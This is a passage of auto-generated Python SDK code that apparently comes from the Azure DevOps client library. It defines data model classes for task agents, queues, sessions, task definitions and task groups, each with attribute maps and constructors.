_attribute_map = {
'exponent': {'key': 'exponent', 'type': 'str'},
'modulus': {'key': 'modulus', 'type': 'str'}
}
def __init__(self, exponent=None, modulus=None):
super(TaskAgentPublicKey, self).__init__()
self.exponent = exponent
self.modulus = modulus
class TaskAgentQueue(Model):
"""
An agent queue.
:param id: ID of the queue
:type id: int
:param name: Name of the queue
:type name: str
:param pool: Pool reference for this queue
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project_id: Project ID
:type project_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project_id': {'key': 'projectId', 'type': 'str'}
}
def __init__(self, id=None, name=None, pool=None, project_id=None):
super(TaskAgentQueue, self).__init__()
self.id = id
self.name = name
self.pool = pool
self.project_id = project_id
class TaskAgentReference(Model):
"""
A reference to an agent.
:param _links:
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.task_agent.models.ReferenceLinks>`
:param access_point: This agent's access point.
:type access_point: str
:param enabled: Whether or not this agent should run jobs.
:type enabled: bool
:param id: Identifier of the agent.
:type id: int
:param name: Name of the agent.
:type name: str
:param os_description: Agent OS.
:type os_description: str
:param provisioning_state: Provisioning state of this agent.
:type provisioning_state: str
:param status: Whether or not the agent is online.
:type status: object
:param version: Agent version.
:type version: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'access_point': {'key': 'accessPoint', 'type': 'str'},
'enabled': {'key': 'enabled', 'type': 'bool'},
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'os_description': {'key': 'osDescription', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'version': {'key': 'version', 'type': 'str'}
}
def __init__(self, _links=None, access_point=None, enabled=None, id=None, name=None, os_description=None, provisioning_state=None, status=None, version=None):
super(TaskAgentReference, self).__init__()
self._links = _links
self.access_point = access_point
self.enabled = enabled
self.id = id
self.name = name
self.os_description = os_description
self.provisioning_state = provisioning_state
self.status = status
self.version = version
class TaskAgentSession(Model):
"""
Represents a session for performing message exchanges from an agent.
:param agent: Gets or sets the agent which is the target of the session.
:type agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param encryption_key: Gets the key used to encrypt message traffic for this session.
:type encryption_key: :class:`TaskAgentSessionKey <azure.devops.v5_1.task_agent.models.TaskAgentSessionKey>`
:param owner_name: Gets or sets the owner name of this session. Generally this will be the machine of origination.
:type owner_name: str
:param session_id: Gets the unique identifier for this session.
:type session_id: str
:param system_capabilities:
:type system_capabilities: dict
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgentReference'},
'encryption_key': {'key': 'encryptionKey', 'type': 'TaskAgentSessionKey'},
'owner_name': {'key': 'ownerName', 'type': 'str'},
'session_id': {'key': 'sessionId', 'type': 'str'},
'system_capabilities': {'key': 'systemCapabilities', 'type': '{str}'}
}
def __init__(self, agent=None, encryption_key=None, owner_name=None, session_id=None, system_capabilities=None):
super(TaskAgentSession, self).__init__()
self.agent = agent
self.encryption_key = encryption_key
self.owner_name = owner_name
self.session_id = session_id
self.system_capabilities = system_capabilities
class TaskAgentSessionKey(Model):
"""
Represents a symmetric key used for message-level encryption for communication sent to an agent.
:param encrypted: Gets or sets a value indicating whether or not the key value is encrypted. If this value is true, the Value property should be decrypted using the <c>RSA</c> key exchanged with the server during registration.
:type encrypted: bool
:param value: Gets or sets the symmetric key value.
:type value: str
"""
_attribute_map = {
'encrypted': {'key': 'encrypted', 'type': 'bool'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, encrypted=None, value=None):
super(TaskAgentSessionKey, self).__init__()
self.encrypted = encrypted
self.value = value
class TaskAgentUpdate(Model):
"""
Details about an agent update.
:param current_state: Current state of this agent update.
:type current_state: str
:param reason: Reason for this update.
:type reason: :class:`TaskAgentUpdateReason <azure.devops.v5_1.task_agent.models.TaskAgentUpdateReason>`
:param requested_by: Identity which requested this update.
:type requested_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param request_time: Date on which this update was requested.
:type request_time: datetime
:param source_version: Source agent version of the update.
:type source_version: :class:`PackageVersion <azure.devops.v5_1.task_agent.models.PackageVersion>`
:param target_version: Target agent version of the update.
:type target_version: :class:`PackageVersion <azure.devops.v5_1.task_agent.models.PackageVersion>`
"""
_attribute_map = {
'current_state': {'key': 'currentState', 'type': 'str'},
'reason': {'key': 'reason', 'type': 'TaskAgentUpdateReason'},
'requested_by': {'key': 'requestedBy', 'type': 'IdentityRef'},
'request_time': {'key': 'requestTime', 'type': 'iso-8601'},
'source_version': {'key': 'sourceVersion', 'type': 'PackageVersion'},
'target_version': {'key': 'targetVersion', 'type': 'PackageVersion'}
}
def __init__(self, current_state=None, reason=None, requested_by=None, request_time=None, source_version=None, target_version=None):
super(TaskAgentUpdate, self).__init__()
self.current_state = current_state
self.reason = reason
self.requested_by = requested_by
self.request_time = request_time
self.source_version = source_version
self.target_version = target_version
class TaskAgentUpdateReason(Model):
"""
:param code:
:type code: object
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'object'}
}
def __init__(self, code=None):
super(TaskAgentUpdateReason, self).__init__()
self.code = code
class TaskDefinition(Model):
"""
:param agent_execution:
:type agent_execution: :class:`TaskExecution <azure.devops.v5_1.task_agent.models.TaskExecution>`
:param author:
:type author: str
:param category:
:type category: str
:param contents_uploaded:
:type contents_uploaded: bool
:param contribution_identifier:
:type contribution_identifier: str
:param contribution_version:
:type contribution_version: str
:param data_source_bindings:
:type data_source_bindings: list of :class:`DataSourceBinding <azure.devops.v5_1.task_agent.models.DataSourceBinding>`
:param definition_type:
:type definition_type: str
:param demands:
:type demands: list of :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param deprecated:
:type deprecated: bool
:param description:
:type description: str
:param disabled:
:type disabled: bool
:param ecosystem:
:type ecosystem: str
:param execution:
:type execution: dict
:param friendly_name:
:type friendly_name: str
:param groups:
:type groups: list of :class:`TaskGroupDefinition <azure.devops.v5_1.task_agent.models.TaskGroupDefinition>`
:param help_mark_down:
:type help_mark_down: str
:param help_url:
:type help_url: str
:param host_type:
:type host_type: str
:param icon_url:
:type icon_url: str
:param id:
:type id: str
:param inputs:
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format:
:type instance_name_format: str
:param minimum_agent_version:
:type minimum_agent_version: str
:param name:
:type name: str
:param output_variables:
:type output_variables: list of :class:`TaskOutputVariable <azure.devops.v5_1.task_agent.models.TaskOutputVariable>`
:param package_location:
:type package_location: str
:param package_type:
:type package_type: str
:param post_job_execution:
:type post_job_execution: dict
:param pre_job_execution:
:type pre_job_execution: dict
:param preview:
:type preview: bool
:param release_notes:
:type release_notes: str
:param runs_on:
:type runs_on: list of str
:param satisfies:
:type satisfies: list of str
:param server_owned:
:type server_owned: bool
:param show_environment_variables:
:type show_environment_variables: bool
:param source_definitions:
:type source_definitions: list of :class:`TaskSourceDefinition <azure.devops.v5_1.task_agent.models.TaskSourceDefinition>`
:param source_location:
:type source_location: str
:param version:
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
:param visibility:
:type visibility: list of str
"""
_attribute_map = {
'agent_execution': {'key': 'agentExecution', 'type': 'TaskExecution'},
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'contents_uploaded': {'key': 'contentsUploaded', 'type': 'bool'},
'contribution_identifier': {'key': 'contributionIdentifier', 'type': 'str'},
'contribution_version': {'key': 'contributionVersion', 'type': 'str'},
'data_source_bindings': {'key': 'dataSourceBindings', 'type': '[DataSourceBinding]'},
'definition_type': {'key': 'definitionType', 'type': 'str'},
'demands': {'key': 'demands', 'type': '[object]'},
'deprecated': {'key': 'deprecated', 'type': 'bool'},
'description': {'key': 'description', 'type': 'str'},
'disabled': {'key': 'disabled', 'type': 'bool'},
'ecosystem': {'key': 'ecosystem', 'type': 'str'},
'execution': {'key': 'execution', 'type': '{object}'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'groups': {'key': 'groups', 'type': '[TaskGroupDefinition]'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'help_url': {'key': 'helpUrl', 'type': 'str'},
'host_type': {'key': 'hostType', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'minimum_agent_version': {'key': 'minimumAgentVersion', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'output_variables': {'key': 'outputVariables', 'type': '[TaskOutputVariable]'},
'package_location': {'key': 'packageLocation', 'type': 'str'},
'package_type': {'key': 'packageType', 'type': 'str'},
'post_job_execution': {'key': 'postJobExecution', 'type': '{object}'},
'pre_job_execution': {'key': 'preJobExecution', 'type': '{object}'},
'preview': {'key': 'preview', 'type': 'bool'},
'release_notes': {'key': 'releaseNotes', 'type': 'str'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'satisfies': {'key': 'satisfies', 'type': '[str]'},
'server_owned': {'key': 'serverOwned', 'type': 'bool'},
'show_environment_variables': {'key': 'showEnvironmentVariables', 'type': 'bool'},
'source_definitions': {'key': 'sourceDefinitions', 'type': '[TaskSourceDefinition]'},
'source_location': {'key': 'sourceLocation', 'type': 'str'},
'version': {'key': 'version', 'type': 'TaskVersion'},
'visibility': {'key': 'visibility', 'type': '[str]'}
}
def __init__(self, agent_execution=None, author=None, category=None, contents_uploaded=None, contribution_identifier=None, contribution_version=None, data_source_bindings=None, definition_type=None, demands=None, deprecated=None, description=None, disabled=None, ecosystem=None, execution=None, friendly_name=None, groups=None, help_mark_down=None, help_url=None, host_type=None, icon_url=None, id=None, inputs=None, instance_name_format=None, minimum_agent_version=None, name=None, output_variables=None, package_location=None, package_type=None, post_job_execution=None, pre_job_execution=None, preview=None, release_notes=None, runs_on=None, satisfies=None, server_owned=None, show_environment_variables=None, source_definitions=None, source_location=None, version=None, visibility=None):
super(TaskDefinition, self).__init__()
self.agent_execution = agent_execution
self.author = author
self.category = category
self.contents_uploaded = contents_uploaded
self.contribution_identifier = contribution_identifier
self.contribution_version = contribution_version
self.data_source_bindings = data_source_bindings
self.definition_type = definition_type
self.demands = demands
self.deprecated = deprecated
self.description = description
self.disabled = disabled
self.ecosystem = ecosystem
self.execution = execution
self.friendly_name = friendly_name
self.groups = groups
self.help_mark_down = help_mark_down
self.help_url = help_url
self.host_type = host_type
self.icon_url = icon_url
self.id = id
self.inputs = inputs
self.instance_name_format = instance_name_format
self.minimum_agent_version = minimum_agent_version
self.name = name
self.output_variables = output_variables
self.package_location = package_location
self.package_type = package_type
self.post_job_execution = post_job_execution
self.pre_job_execution = pre_job_execution
self.preview = preview
self.release_notes = release_notes
self.runs_on = runs_on
self.satisfies = satisfies
self.server_owned = server_owned
self.show_environment_variables = show_environment_variables
self.source_definitions = source_definitions
self.source_location = source_location
self.version = version
self.visibility = visibility
class TaskDefinitionEndpoint(Model):
"""
:param connection_id: An ID that identifies a service connection to be used for authenticating endpoint requests.
:type connection_id: str
:param key_selector: An Json based keyselector to filter response returned by fetching the endpoint <c>Url</c>.A Json based keyselector must be prefixed with "jsonpath:". KeySelector can be used to specify the filter to get the keys for the values specified with Selector. <example> The following keyselector defines an Json for extracting nodes named 'ServiceName'. <code> endpoint.KeySelector = "jsonpath://ServiceName"; </code></example>
:type key_selector: str
:param scope: The scope as understood by Connected Services. Essentially, a project-id for now.
:type scope: str
:param selector: An XPath/Json based selector to filter response returned by fetching the endpoint <c>Url</c>. An XPath based selector must be prefixed with the string "xpath:". A Json based selector must be prefixed with "jsonpath:". <example> The following selector defines an XPath for extracting nodes named 'ServiceName'. <code> endpoint.Selector = "xpath://ServiceName"; </code></example>
:type selector: str
:param task_id: TaskId that this endpoint belongs to.
:type task_id: str
:param url: URL to GET.
:type url: str
"""
_attribute_map = {
'connection_id': {'key': 'connectionId', 'type': 'str'},
'key_selector': {'key': 'keySelector', 'type': 'str'},
'scope': {'key': 'scope', 'type': 'str'},
'selector': {'key': 'selector', 'type': 'str'},
'task_id': {'key': 'taskId', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, connection_id=None, key_selector=None, scope=None, selector=None, task_id=None, url=None):
super(TaskDefinitionEndpoint, self).__init__()
self.connection_id = connection_id
self.key_selector = key_selector
self.scope = scope
self.selector = selector
self.task_id = task_id
self.url = url
class TaskDefinitionReference(Model):
"""
:param definition_type: Gets or sets the definition type. Values can be 'task' or 'metaTask'.
:type definition_type: str
:param id: Gets or sets the unique identifier of task.
:type id: str
:param version_spec: Gets or sets the version specification of task.
:type version_spec: str
"""
_attribute_map = {
'definition_type': {'key': 'definitionType', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'version_spec': {'key': 'versionSpec', 'type': 'str'}
}
def __init__(self, definition_type=None, id=None, version_spec=None):
super(TaskDefinitionReference, self).__init__()
self.definition_type = definition_type
self.id = id
self.version_spec = version_spec
class TaskExecution(Model):
"""
:param exec_task: The utility task to run. Specifying this means that this task definition is simply a meta task to call another task. This is useful for tasks that call utility tasks like powershell and commandline
:type exec_task: :class:`TaskReference <azure.devops.v5_1.task_agent.models.TaskReference>`
:param platform_instructions: If a task is going to run code, then this provides the type/script etc... information by platform. For example, it might look like. net45: { typeName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShellTask", assemblyName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShell.dll" } net20: { typeName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShellTask", assemblyName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShell.dll" } java: { jar: "powershelltask.tasks.automation.teamfoundation.microsoft.com", } node: { script: "powershellhost.js", }
:type platform_instructions: dict
"""
_attribute_map = {
'exec_task': {'key': 'execTask', 'type': 'TaskReference'},
'platform_instructions': {'key': 'platformInstructions', 'type': '{{str}}'}
}
def __init__(self, exec_task=None, platform_instructions=None):
super(TaskExecution, self).__init__()
self.exec_task = exec_task
self.platform_instructions = platform_instructions
class TaskGroup(TaskDefinition):
"""
:param agent_execution:
:type agent_execution: :class:`TaskExecution <azure.devops.v5_1.task_agent.models.TaskExecution>`
:param author:
:type author: str
:param category:
:type category: str
:param contents_uploaded:
:type contents_uploaded: bool
:param contribution_identifier:
:type contribution_identifier: str
:param contribution_version:
:type contribution_version: str
:param data_source_bindings:
:type data_source_bindings: list of :class:`DataSourceBinding <azure.devops.v5_1.task_agent.models.DataSourceBinding>`
:param definition_type:
:type definition_type: str
:param demands:
:type demands: list of :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param deprecated:
:type deprecated: bool
:param description:
:type description: str
:param disabled:
:type disabled: bool
:param ecosystem:
:type ecosystem: str
:param execution:
:type execution: dict
:param friendly_name:
:type friendly_name: str
:param groups:
:type groups: list of :class:`TaskGroupDefinition <azure.devops.v5_1.task_agent.models.TaskGroupDefinition>`
:param help_mark_down:
:type help_mark_down: str
:param help_url:
:type help_url: str
:param host_type:
:type host_type: str
:param icon_url:
:type icon_url: str
:param id:
:type id: str
:param inputs:
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format:
:type instance_name_format: str
:param minimum_agent_version:
:type minimum_agent_version: str
:param name:
:type name: str
:param output_variables:
:type output_variables: list of :class:`TaskOutputVariable <azure.devops.v5_1.task_agent.models.TaskOutputVariable>`
:param package_location:
:type package_location: str
:param package_type:
:type package_type: str
:param post_job_execution:
:type post_job_execution: dict
:param pre_job_execution:
:type pre_job_execution: dict
:param preview:
:type preview: bool
:param release_notes:
:type release_notes: str
:param runs_on:
:type runs_on: list of str
:param satisfies:
:type satisfies: list of str
:param server_owned:
:type server_owned: bool
:param show_environment_variables:
:type show_environment_variables: bool
:param source_definitions:
:type source_definitions: list of :class:`TaskSourceDefinition <azure.devops.v5_1.task_agent.models.TaskSourceDefinition>`
:param source_location:
:type source_location: str
:param version:
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
:param visibility:
:type visibility: list of str
:param comment: Gets or sets comment.
:type comment: str
:param created_by: Gets or sets the identity who created.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on: Gets or sets date on which it got created.
:type created_on: datetime
:param deleted: Gets or sets as 'true' to indicate as deleted, 'false' otherwise.
:type deleted: bool
:param modified_by: Gets or sets the identity who modified.
:type modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param modified_on: Gets or sets date on which it got modified.
:type modified_on: datetime
:param owner: Gets or sets the owner.
:type owner: str
:param parent_definition_id: Gets or sets parent task group Id. This is used while creating a draft task group.
:type parent_definition_id: str
:param revision: Gets or sets revision.
:type revision: int
:param tasks: Gets or sets the tasks.
:type tasks: list of :class:`TaskGroupStep <azure.devops.v5_1.task_agent.models.TaskGroupStep>`
"""
_attribute_map = {
'agent_execution': {'key': 'agentExecution', 'type': 'TaskExecution'},
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'contents_uploaded': {'key': 'contentsUploaded', 'type': 'bool'},
'contribution_identifier': {'key': 'contributionIdentifier', 'type': 'str'},
'contribution_version': {'key': 'contributionVersion', 'type': 'str'},
'data_source_bindings': {'key': 'dataSourceBindings', 'type': '[DataSourceBinding]'},
'definition_type': {'key': 'definitionType', 'type': 'str'},
'demands': {'key': 'demands', 'type': '[object]'},
'deprecated': {'key': 'deprecated', 'type': 'bool'},
'description': {'key': 'description', 'type': 'str'},
'disabled': {'key': 'disabled', 'type': 'bool'},
'ecosystem': {'key': 'ecosystem', 'type': 'str'},
'execution': {'key': 'execution', 'type': '{object}'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'groups': {'key': 'groups', 'type': '[TaskGroupDefinition]'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'help_url': {'key': 'helpUrl', 'type': 'str'},
'host_type': {'key': 'hostType', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'minimum_agent_version': {'key': 'minimumAgentVersion', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'output_variables': {'key': 'outputVariables', 'type': '[TaskOutputVariable]'},
'package_location': {'key': 'packageLocation', 'type': 'str'},
'package_type': {'key': 'packageType', 'type': 'str'},
'post_job_execution': {'key': 'postJobExecution', 'type': '{object}'},
'pre_job_execution': {'key': 'preJobExecution', 'type': '{object}'},
'preview': {'key': 'preview', 'type': 'bool'},
'release_notes': {'key': 'releaseNotes', 'type': 'str'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'satisfies': {'key': 'satisfies', 'type': '[str]'},
'server_owned': {'key': 'serverOwned', 'type': 'bool'},
'show_environment_variables': {'key': 'showEnvironmentVariables', 'type': 'bool'},
'source_definitions': {'key': 'sourceDefinitions', 'type': '[TaskSourceDefinition]'},
'source_location': {'key': 'sourceLocation', 'type': 'str'},
'version': {'key': 'version', 'type': 'TaskVersion'},
'visibility': {'key': 'visibility', 'type': '[str]'},
'comment': {'key': 'comment', 'type': 'str'},
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'deleted': {'key': 'deleted', 'type': 'bool'},
'modified_by': {'key': 'modifiedBy', 'type': 'IdentityRef'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'owner': {'key': 'owner', 'type': 'str'},
'parent_definition_id': {'key': 'parentDefinitionId', 'type': 'str'},
'revision': {'key': 'revision', 'type': 'int'},
'tasks': {'key': 'tasks', 'type': '[TaskGroupStep]'}
}
def __init__(self, agent_execution=None, author=None, category=None, contents_uploaded=None, contribution_identifier=None, contribution_version=None, data_source_bindings=None, definition_type=None, demands=None, deprecated=None, description=None, disabled=None, ecosystem=None, execution=None, friendly_name=None, groups=None, help_mark_down=None, help_url=None, host_type=None, icon_url=None, id=None, inputs=None, instance_name_format=None, minimum_agent_version=None, name=None, output_variables=None, package_location=None, package_type=None, post_job_execution=None, pre_job_execution=None, preview=None, release_notes=None, runs_on=None, satisfies=None, server_owned=None, show_environment_variables=None, source_definitions=None, source_location=None, version=None, visibility=None, comment=None, created_by=None, created_on=None, deleted=None, modified_by=None, modified_on=None, owner=None, parent_definition_id=None, revision=None, tasks=None):
super(TaskGroup, self).__init__(agent_execution=agent_execution, author=author, category=category, contents_uploaded=contents_uploaded, contribution_identifier=contribution_identifier, contribution_version=contribution_version, data_source_bindings=data_source_bindings, definition_type=definition_type, demands=demands, deprecated=deprecated, description=description, disabled=disabled, ecosystem=ecosystem, execution=execution, friendly_name=friendly_name, groups=groups, help_mark_down=help_mark_down, help_url=help_url, host_type=host_type, icon_url=icon_url, id=id, inputs=inputs, instance_name_format=instance_name_format, minimum_agent_version=minimum_agent_version, name=name, output_variables=output_variables, package_location=package_location, package_type=package_type, post_job_execution=post_job_execution, pre_job_execution=pre_job_execution, preview=preview, release_notes=release_notes, runs_on=runs_on, satisfies=satisfies, server_owned=server_owned, show_environment_variables=show_environment_variables, source_definitions=source_definitions, source_location=source_location, version=version, visibility=visibility)
self.comment = comment
self.created_by = created_by
self.created_on = created_on
self.deleted = deleted
self.modified_by = modified_by
self.modified_on = modified_on
self.owner = owner
self.parent_definition_id = parent_definition_id
self.revision = revision
self.tasks = tasks
class TaskGroupCreateParameter(Model):
"""
:param author: Sets author name of the task group.
:type author: str
:param category: Sets category of the task group.
:type category: str
:param description: Sets description of the task group.
:type description: str
:param friendly_name: Sets friendly name of the task group.
:type friendly_name: str
:param icon_url: Sets url icon of the task group.
:type icon_url: str
:param inputs: Sets input for the task group.
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format: Sets display name of the task group.
:type instance_name_format: str
:param name: Sets name of the task group.
:type name: str
:param parent_definition_id: Sets parent task group Id. This is used while creating a draft task group.
:type parent_definition_id: str
:param runs_on: Sets RunsOn of the task group. Value can be 'Agent', 'Server' or 'DeploymentGroup'.
:type runs_on: list of str
:param tasks: Sets tasks for the task group.
:type tasks: list of :class:`TaskGroupStep <azure.devops.v5_1.task_agent.models.TaskGroupStep>`
:param version: Sets version of the task group.
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
"""
_attribute_map = {
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'parent_definition_id': {'key': 'parentDefinitionId', 'type': 'str'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'tasks': {'key': 'tasks', 'type': '[TaskGroupStep]'},
'version': {'key': 'version', 'type': 'TaskVersion'}
}
def __init__(self, author=None, category=None, description=None, friendly_name=None, icon_url=None, inputs=None, instance_name_format=None, name=None, parent_definition_id=None, runs_on=None, tasks=None, version=None):
super(TaskGroupCreateParameter, self).__init__()
self.author = author
self.category = category
self.description = description
self.friendly_name = friendly_name
self.icon_url = icon_url
self.inputs = inputs
self.instance_name_format = instance_name_format
self.name = name
self.parent_definition_id = parent_definition_id
self.runs_on = runs_on
self.tasks = tasks
self.version = version
class TaskGroupDefinition(Model):
"""
:param display_name:
:type display_name: str
:param is_expanded:
:type is_expanded: bool
:param name:
:type name: str
:param tags:
:type tags: list of str
:param visible_rule:
:type visible_rule: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'is_expanded': {'key': 'isExpanded', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'tags': {'key': 'tags', 'type': '[str]'},
'visible_rule': {'key': 'visibleRule', 'type': 'str'}
}
def __init__(self, display_name=None, is_expanded=None, name=None, tags=None, visible_rule=None):
super(TaskGroupDefinition, self).__init__()
self.display_name = display_name
self.is_expanded = is_expanded
self.name = name
self.tags = tags
self.visible_rule = visible_rule
class TaskGroupRevision(Model):
"""
:param changed_by:
:type changed_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param changed_date:
:type changed_date: datetime
:param change_type:
:type change_type: object
:param comment:
:type comment: str
:param file_id:
:type file_id: int
:param major_version:
:type major_version: int
:param revision:
:type revision: int
:param task_group_id:
:type task_group_id: str
"""
_attribute_map = {
'changed_by': {'key': 'changedBy', 'type': 'IdentityRef'},
'changed_date': {'key': 'changedDate', 'type': 'iso-8601'},
'change_type': {'key': 'changeType', 'type': 'object'},
'comment': {'key': 'comment', 'type': 'str'},
'file_id': {'key': 'fileId', 'type': 'int'},
'major_version': {'key': 'majorVersion', 'type': 'int'},
'revision': {'key': 'revision', 'type': 'int'},
'task_group_id': {'key': 'taskGroupId', 'type': 'str'}
}
def __init__(self, changed_by=None, changed_date=None, change_type=None, comment=None, file_id=None, major_version=None, revision=None, task_group_id=None):
super(TaskGroupRevision, self).__init__()
self.changed_by = changed_by
self.changed_date = changed_date
self.change_type = change_type
self.comment = comment
self.file_id = file_id
self.major_version = major_version
self.revision = revision
self.task_group_id = task_group_id
class TaskGroupStep(Model):
"""
Represents tasks in the task group.
:param always_run: Gets or sets as 'true' to run the task always, 'false' otherwise.
:type always_run: bool
:param condition: Gets or sets condition for the task.
:type condition: str
:param continue_on_error: Gets or sets as 'true' to continue on error, 'false' otherwise.
:type continue_on_error: bool
:param display_name: Gets or sets the display name.
:type display_name: str
:param enabled: Gets or sets as task is enabled or not.
:type enabled: bool
:param environment: Gets dictionary of environment variables.
:type environment: dict
:param inputs: Gets or sets dictionary of inputs.
:type inputs: dict
:param task: Gets or sets the reference of the task.
:type task: :class:`TaskDefinitionReference <azure.devops.v5_1.task_agent.models.TaskDefinitionReference>`
:param timeout_in_minutes: Gets or sets the maximum time, in minutes, that a task is allowed to execute on agent before being cancelled by server. A zero value indicates an infinite timeout.
:type timeout_in_minutes: int
"""
_attribute_map = {
'always_run': {'key': 'alwaysRun', 'type': 'bool'},
'condition': {'key': 'condition', 'type': 'str'},
'continue_on_error': {'key': 'continueOnError', 'type': 'bool'},
'display_name': {'key': 'displayName', 'type': 'str'},
'enabled': {'key': 'enabled', 'type': 'bool'},
'environment': {'key': 'environment', 'type': '{str}'},
'inputs': {'key': 'inputs', 'type': '{str}'},
'task': {'key': 'task', 'type': 'TaskDefinitionReference'},
'timeout_in_minutes': {'key': 'timeoutInMinutes', 'type': 'int'}
}
def __init__(self, always_run=None, condition=None, continue_on_error=None, display_name=None, enabled=None, environment=None, inputs=None, task=None, timeout_in_minutes=None):
super(TaskGroupStep, self).__init__()
self.always_run = always_run
self.condition = condition
self.continue_on_error = continue_on_error
self.display_name = display_name
self.enabled = enabled
self.environment = environment
self.inputs = inputs
self.task = task
self.timeout_in_minutes = timeout_in_minutes
class TaskGroupUpdateParameter(Model):
"""
:param author: Sets author name of the task group.
:type author: str
:param category: Sets category of the task group.
:type category: str
:param comment: Sets comment of the task group.
:type comment: str
:param description: Sets description of the task group.
:type description: str
:param friendly_name: Sets friendly name of the task group.
:type friendly_name: str
:param icon_url: Sets url icon of the task group.
:type icon_url: str
:param id: Sets the unique identifier of this field.
:type id: str
:param inputs: Sets input for the task group.
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format: Sets display name of the task group.
:type instance_name_format: str
:param name: Sets name of the task group.
:type name: str
:param parent_definition_id: Gets or sets parent task group Id. This is used while creating a draft task group.
:type parent_definition_id: str
:param revision: Sets revision of the task group.
:type revision: int
:param runs_on: Sets RunsOn of the task group. Value can be 'Agent', 'Server' or 'DeploymentGroup'.
:type runs_on: list of str
:param tasks: Sets tasks for the task group.
:type tasks: list of :class:`TaskGroupStep <azure.devops.v5_1.task_agent.models.TaskGroupStep>`
:param version: Sets version of the task group.
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
"""
_attribute_map = {
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'comment': {'key': 'comment', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'parent_definition_id': {'key': 'parentDefinitionId', 'type': 'str'},
'revision': {'key': 'revision', 'type': 'int'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'tasks': {'key': 'tasks', 'type': '[TaskGroupStep]'},
'version': {'key': 'version', 'type': 'TaskVersion'}
}
def __init__(self, author=None, category=None, comment=None, description=None, friendly_name=None, icon_url=None, id=None, inputs=None, instance_name_format=None, name=None, parent_definition_id=None, revision=None, runs_on=None, tasks=None, version=None):
super(TaskGroupUpdateParameter, self).__init__()
self.author = author
self.category = category
self.comment = comment
self.description = description
